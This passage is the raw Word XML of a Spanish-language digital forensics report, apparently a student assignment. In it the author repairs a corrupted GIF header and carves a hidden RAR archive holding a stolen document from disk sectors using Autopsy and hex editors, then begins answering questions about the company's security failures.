      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Analisis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043D1B2E" w14:textId="7A51821A" w:rsidR="003E29B4" w:rsidRDefault="003E29B4" w:rsidP="00EF181B">
      <w:r w:rsidRPr="003E29B4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="552FC67A" wp14:editId="00D4AF30">
            <wp:extent cx="5400040" cy="28956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895600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F90C18" w14:textId="4C1F9B37" w:rsidR="003E29B4" w:rsidRDefault="003E29B4" w:rsidP="00EF181B"/>
    <w:p w14:paraId="039788AF" w14:textId="4D96E3DA" w:rsidR="0014220F" w:rsidRDefault="00EE3DFE" w:rsidP="00EF181B">
      <w:r>
        <w:t>Inspec</w:t>
      </w:r>
      <w:r w:rsidR="0014220F">
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>ionando las imágenes</w:t>
      </w:r>
      <w:r w:rsidR="0014220F">
        <w:t>, después de investigar (</w:t>
      </w:r>
      <w:hyperlink r:id="rId38" w:history="1">
        <w:r w:rsidR="0014220F" w:rsidRPr="00092DF0">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://ntfs.com/gif-signature-format.htm</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0014220F">
        <w:t xml:space="preserve"> ) me doy cuenta de que </w:t>
      </w:r>
      <w:r w:rsidR="00C858EA">
        <w:t xml:space="preserve">en </w:t>
      </w:r>
      <w:r w:rsidR="0014220F">
        <w:t>corona.gif los primeros dígitos no coinciden, es como que la cabecera este mal y por eso no se ve la imagen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D543D3" w14:textId="77777777" w:rsidR="0014220F" w:rsidRDefault="0014220F" w:rsidP="00EF181B">
      <w:r w:rsidRPr="0014220F">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7072C2AD" wp14:editId="19CCA3B7">
            <wp:extent cx="5400040" cy="2849245"/>
            <wp:effectExtent l="0" t="0" r="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849245"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3F7FF5" w14:textId="2130094F" w:rsidR="0014220F" w:rsidRDefault="0014220F" w:rsidP="00EF181B">
      <w:r>
        <w:t xml:space="preserve">Proceso a solucionarlo. Exporto el gif y lo abro con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hexedit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007F645A">
        <w:t xml:space="preserve">, modifico el 00 por 49 que fue lo que </w:t>
      </w:r>
      <w:r w:rsidR="00D71001">
        <w:t>vi</w:t>
      </w:r>
      <w:r w:rsidR="007F645A">
        <w:t xml:space="preserve"> en la web que puesto anteriormente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B2207F" w14:textId="676DE8D1" w:rsidR="007F645A" w:rsidRDefault="007F645A" w:rsidP="00EF181B">
      <w:r w:rsidRPr="007F645A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E898D89" wp14:editId="3B50C84D">
            <wp:extent cx="5400040" cy="290830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908300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="739261CC" w14:textId="3C61BB54" w:rsidR="003E29B4" w:rsidRDefault="003E29B4" w:rsidP="00EF181B"/>
    <w:p w14:paraId="18F8CB94" w14:textId="0C5C5C96" w:rsidR="00EF181B" w:rsidRDefault="007F645A" w:rsidP="00EF181B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ahora ya se puede ver la imagen.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007F645A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53C61F69" wp14:editId="3D3D8A47">
            <wp:extent cx="5400040" cy="291655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916555"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E589C84" w14:textId="77777777" w:rsidR="007F645A" w:rsidRPr="00EF181B" w:rsidRDefault="007F645A" w:rsidP="00EF181B"/>
    <w:p w14:paraId="02E447DE" w14:textId="38794C5F" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F645A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Localizar el fichero sustraído en la información. Puede que esta información no esté a la vista, sino que esté ofuscada en otro fichero.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207398E1" w14:textId="078297D5" w:rsidR="007F645A" w:rsidRDefault="009B4BC4" w:rsidP="007F645A">
      <w:r>
        <w:t xml:space="preserve">Procedo a buscar el archivo felicidad.docx, en la búsqueda de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>autopsy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38076EFE" w14:textId="2B56A831" w:rsidR="009B4BC4" w:rsidRPr="009B4BC4" w:rsidRDefault="009B4BC4" w:rsidP="007F645A">
      <w:r w:rsidRPr="009B4BC4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="367F220A" wp14:editId="0CFA585C">
            <wp:extent cx="5400040" cy="292290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922905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="744AB912" w14:textId="77777777" w:rsidR="009B4BC4" w:rsidRDefault="009B4BC4" w:rsidP="009B4BC4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EA7C30A" w14:textId="77777777" w:rsidR="00571E5A" w:rsidRDefault="009B4BC4" w:rsidP="009B4BC4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Obtengo los siguientes resultados.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009B4BC4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65919075" wp14:editId="16C56B40">
            <wp:extent cx="5400040" cy="291719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917190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E36D5B8" w14:textId="77777777" w:rsidR="00571E5A" w:rsidRDefault="00571E5A" w:rsidP="009B4BC4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="775C983E" w14:textId="4CF4B3F2" w:rsidR="004C1E26" w:rsidRDefault="004C1E26" w:rsidP="009B4BC4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Reviso el código hexadecimal y buscando, encontré en está página las diferentes cabeceras. </w:t>
      </w:r>
      <w:hyperlink r:id="rId44" w:history="1">
        <w:r w:rsidRPr="00092DF0">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          </w:rPr>
          <w:t>https://www.welivesecurity.com/es/recursos-herramientas/extension-de-un-archivo-cabeceras/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7436CD7A" w14:textId="77777777" w:rsidR="004C1E26" w:rsidRDefault="004C1E26" w:rsidP="009B4BC4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Veo que tiene una cabecera rar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EE048F" w14:textId="77777777" w:rsidR="004C1E26" w:rsidRDefault="004C1E26" w:rsidP="009B4BC4">
      <w:r w:rsidRPr="004C1E26">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31249C19" wp14:editId="50FD046E">
            <wp:extent cx="5400040" cy="288607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886075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D07632D" w14:textId="77777777" w:rsidR="004C1E26" w:rsidRDefault="004C1E26" w:rsidP="009B4BC4"/>
    <w:p w14:paraId="57790218" w14:textId="77777777" w:rsidR="00D53C88" w:rsidRDefault="004C1E26" w:rsidP="009B4BC4">
      <w:r>
        <w:t>Exporto el archivo y le pongo la secuencia de archivo rar al principio, es decir borro lo anterior. Tras intentarlo con un archivo me sale este error….</w:t>
      </w:r>
      <w:r w:rsidR="00D53C88">
        <w:t xml:space="preserve"> Lo modifico con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D53C88">
        <w:t>GHex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D53C88">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336C7D72" w14:textId="77777777" w:rsidR="00D53C88" w:rsidRDefault="00D53C88" w:rsidP="009B4BC4">
      <w:r w:rsidRPr="00D53C88">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="238F0987" wp14:editId="32612546">
            <wp:extent cx="5400040" cy="2892425"/>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92425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="070619E6" w14:textId="77777777" w:rsidR="00D53C88" w:rsidRDefault="00D53C88" w:rsidP="009B4BC4"/>
    <w:p w14:paraId="3A24A80F" w14:textId="77777777" w:rsidR="00D53C88" w:rsidRDefault="00D53C88" w:rsidP="009B4BC4">
      <w:r>
        <w:t>Hago lo siguiente y guardo.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D53C88">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04F02E1A" wp14:editId="2C12FC09">
            <wp:extent cx="5400040" cy="29190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919095"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="79061C34" w14:textId="77777777" w:rsidR="00D53C88" w:rsidRDefault="00D53C88" w:rsidP="009B4BC4"/>
    <w:p w14:paraId="19C01586" w14:textId="149198B1" w:rsidR="006046C8" w:rsidRDefault="003C7B53" w:rsidP="009B4BC4">
      <w:r>
        <w:t>Hago much</w:t>
      </w:r>
      <w:r w:rsidR="006046C8">
        <w:t xml:space="preserve">as pruebas, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">pero no consigo que funcione, al final copio los hexadecimales, y me creo un </w:t>
      </w:r>
      <w:r w:rsidR="00B63374">
        <w:t>nuevo archivo</w:t>
      </w:r>
      <w:r w:rsidR="006046C8">
        <w:t xml:space="preserve"> con esos datos, quiero poder descomprimir el rar, ya que dentro está el docx.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609A872E" w14:textId="42214E65" w:rsidR="006046C8" w:rsidRDefault="006046C8" w:rsidP="009B4BC4">
      <w:r w:rsidRPr="006046C8">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57F0F400" wp14:editId="608D29AA">
            <wp:extent cx="5400040" cy="289623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896235"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C94C51" w14:textId="4646128C" w:rsidR="006046C8" w:rsidRDefault="006046C8" w:rsidP="009B4BC4"/>
    <w:p w14:paraId="278798AF" w14:textId="7C568742" w:rsidR="006046C8" w:rsidRDefault="00A22550" w:rsidP="009B4BC4">
      <w:r>
        <w:t>Pruebo,</w:t>
      </w:r>
      <w:r w:rsidR="006046C8">
        <w:t xml:space="preserve"> pero no funciona…Me descargo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006046C8">
        <w:t>HxD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006046C8">
        <w:t xml:space="preserve"> para Windows y pruebo…</w:t>
      </w:r>
      <w:r w:rsidR="006046C8">
        <w:br/>
      </w:r>
      <w:r w:rsidR="006046C8" w:rsidRPr="006046C8">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3680F2C5" wp14:editId="656B7853">
            <wp:extent cx="5400040" cy="291655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916555"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8FF181" w14:textId="10A16D54" w:rsidR="00A56114" w:rsidRDefault="00A56114" w:rsidP="009B4BC4">
      <w:r>
        <w:t>Tampoco funciona…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEBF3B4" w14:textId="777A6993" w:rsidR="00A56114" w:rsidRDefault="008A6A54" w:rsidP="009B4BC4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Por más que lo intento no soy capaz</w:t>
      </w:r>
      <w:r w:rsidR="00B747F1">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lo </w:t>
      </w:r>
      <w:r w:rsidR="00B747F1">
        <w:t>veo,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pero no puedo extraerlo.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008A6A54">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="170F5928" wp14:editId="40AEBAE1">
            <wp:extent cx="5400040" cy="276923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769235"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0222248C" w14:textId="72E0CB66" w:rsidR="008A6A54" w:rsidRDefault="008A6A54" w:rsidP="009B4BC4"/>
    <w:p w14:paraId="34E7FF45" w14:textId="01D12E88" w:rsidR="008A6A54" w:rsidRDefault="008A6A54" w:rsidP="009B4BC4">
      <w:r>
        <w:t>He probado de todo, como he podido.</w:t>
      </w:r>
      <w:r w:rsidR="00B747F1">
        <w:t xml:space="preserve"> Si busco en VOL1 si que me encuentra la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B747F1">
        <w:t>string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B747F1">
        <w:t xml:space="preserve"> felicidad, pero en VOL2 no me lo encuentra…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313FF6C2" w14:textId="380C35BF" w:rsidR="006046C8" w:rsidRDefault="006046C8" w:rsidP="009B4BC4"/>
    <w:p w14:paraId="0A4D3B6E" w14:textId="77777777" w:rsidR="000B787E" w:rsidRDefault="000B787E" w:rsidP="009B4BC4">
      <w:r>
        <w:t xml:space="preserve">Le di una última oportunidad y lo que hice es hacer un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>extract</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>strings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> del VOL2 no del disk y ahora si que me encuentra valores. Paso a revisarlos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AF5CC0" w14:textId="77777777" w:rsidR="000B787E" w:rsidRDefault="000B787E" w:rsidP="009B4BC4">
      <w:r w:rsidRPr="000B787E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47F01E24" wp14:editId="67EF6142">
            <wp:extent cx="5400040" cy="2912745"/>
            <wp:effectExtent l="0" t="0" r="0" b="190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912745"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="738D681A" w14:textId="165AB575" w:rsidR="000B787E" w:rsidRDefault="000B787E" w:rsidP="009B4BC4">
      <w:r>
        <w:t xml:space="preserve">Sigo el mismo proceso anterior. Lo exporto y lo abro desde </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HxD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en Windows, que me es más cómodo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F00E5D" w14:textId="1EDFE761" w:rsidR="000B787E" w:rsidRDefault="000B787E" w:rsidP="009B4BC4">
      <w:r w:rsidRPr="000B787E">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EBC3188" wp14:editId="3A999184">
            <wp:extent cx="5400040" cy="293814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938145"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4776A0C0" w14:textId="685081B8" w:rsidR="006046C8" w:rsidRDefault="000B787E" w:rsidP="009B4BC4">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F09AA1C" w14:textId="77777777" w:rsidR="000B787E" w:rsidRDefault="000B787E" w:rsidP="009B4BC4">
      <w:r>
        <w:t>Le borro los hexadecimales que no necesitamos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433C62DB" w14:textId="77777777" w:rsidR="000B787E" w:rsidRDefault="000B787E" w:rsidP="009B4BC4">
      <w:r w:rsidRPr="000B787E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CE2B687" wp14:editId="79F17826">
            <wp:extent cx="5400040" cy="29146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914650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0349C9" w14:textId="77777777" w:rsidR="000B787E" w:rsidRDefault="000B787E" w:rsidP="009B4BC4"/>
    <w:p w14:paraId="52F70D9D" w14:textId="1841405C" w:rsidR="000B787E" w:rsidRDefault="000B787E" w:rsidP="009B4BC4">
      <w:r>
        <w:t>Lo guardo como rar.</w:t>
      </w:r>
      <w:r w:rsidR="00382E0B">
        <w:t xml:space="preserve"> Y mismo error….</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B1FC7C" w14:textId="65A01811" w:rsidR="00382E0B" w:rsidRPr="00382E0B" w:rsidRDefault="00382E0B" w:rsidP="009B4BC4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00382E0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>¡Después de probar mil cosas, lo he encontrado!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6667A93A" w14:textId="70D2CE96" w:rsidR="00382E0B" w:rsidRDefault="00382E0B" w:rsidP="009B4BC4">
      <w:r>
        <w:t xml:space="preserve">He hecho lo siguiente… He cogido los sectores en los que estaba la información, y he buscado desde el sector 24166 hasta el 24184 que era el siguiente que tenia datos y tenía la información de docx. He copiado todo el código </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Hex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> y lo he llevado a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HxD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="624C3A97" w14:textId="4DBC1E08" w:rsidR="00382E0B" w:rsidRDefault="00382E0B" w:rsidP="009B4BC4">
      <w:r w:rsidRPr="00382E0B">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D88CC18" wp14:editId="39B23448">
            <wp:extent cx="5400040" cy="2872740"/>
            <wp:effectExtent l="0" t="0" r="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872740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D8FB36" w14:textId="4700D87D" w:rsidR="00382E0B" w:rsidRDefault="00382E0B" w:rsidP="009B4BC4">
      <w:r w:rsidRPr="00382E0B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="595D80D8" wp14:editId="33987A3B">
            <wp:extent cx="5400040" cy="2906395"/>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906395"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="067E0DC7" w14:textId="4815A66D" w:rsidR="00382E0B" w:rsidRDefault="00382E0B" w:rsidP="009B4BC4">
      <w:r>
        <w:t>¡Aquí se puede ver como he eliminado los primeros elementos HEX hasta donde empieza la cabecera Rar!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00242915" w14:textId="0648BDCF" w:rsidR="00382E0B" w:rsidRDefault="00382E0B" w:rsidP="009B4BC4"/>
    <w:p w14:paraId="2FA66400" w14:textId="72792B27" w:rsidR="00382E0B" w:rsidRDefault="00382E0B" w:rsidP="009B4BC4">
      <w:r>
        <w:t>Y ahora ya puedo descomprimir y abrir el Word.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7979D8" w14:textId="510AE145" w:rsidR="00382E0B" w:rsidRDefault="00382E0B" w:rsidP="009B4BC4">
      <w:r w:rsidRPr="00382E0B">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2970E7EA" wp14:editId="43FE7375">
            <wp:extent cx="5400040" cy="290131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901315"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA5C201" w14:textId="3EB57930" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="009B4BC4">
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD59E30" w14:textId="77777777" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc219084521"/>
      <w:r w:rsidRPr="000A3E5D">
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
        </w:rPr>
        <w:t>Apartado 4: Conclusiones del análisis realizado.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="1410563E" w14:textId="0487DA7D" w:rsidR="000A3E5D" w:rsidRPr="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3E5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000A3E5D">
        <w:t>Responde a las siguientes cuestiones:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C943A2" w14:textId="647E0DF2" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00382E0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tras la obtención de todas las evidencias, ¿dónde crees aspectos crees que falló principalmente la seguridad de la empresa? Indica dos aspectos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E9F074" w14:textId="3337546F" w:rsidR="00382E0B" w:rsidRDefault="00382E0B" w:rsidP="00382E0B">
      <w:r>
        <w:t>Está claro que, en la formación de los empleados en primer lugar, ya que nunca se debe instalar nada de un correo, ya lo que adecuado es desde la web oficial, entrando tú mismo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D948FE" w14:textId="45AAF420" w:rsidR="00382E0B" w:rsidRPr="00382E0B" w:rsidRDefault="00382E0B" w:rsidP="00382E0B">
      <w:r>
        <w:t>Por otro lado, el anti virus debería informar de un exe malicioso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31347482" w14:textId="64087137" w:rsidR="000A3E5D" w:rsidRPr="00382E0B" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00382E0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
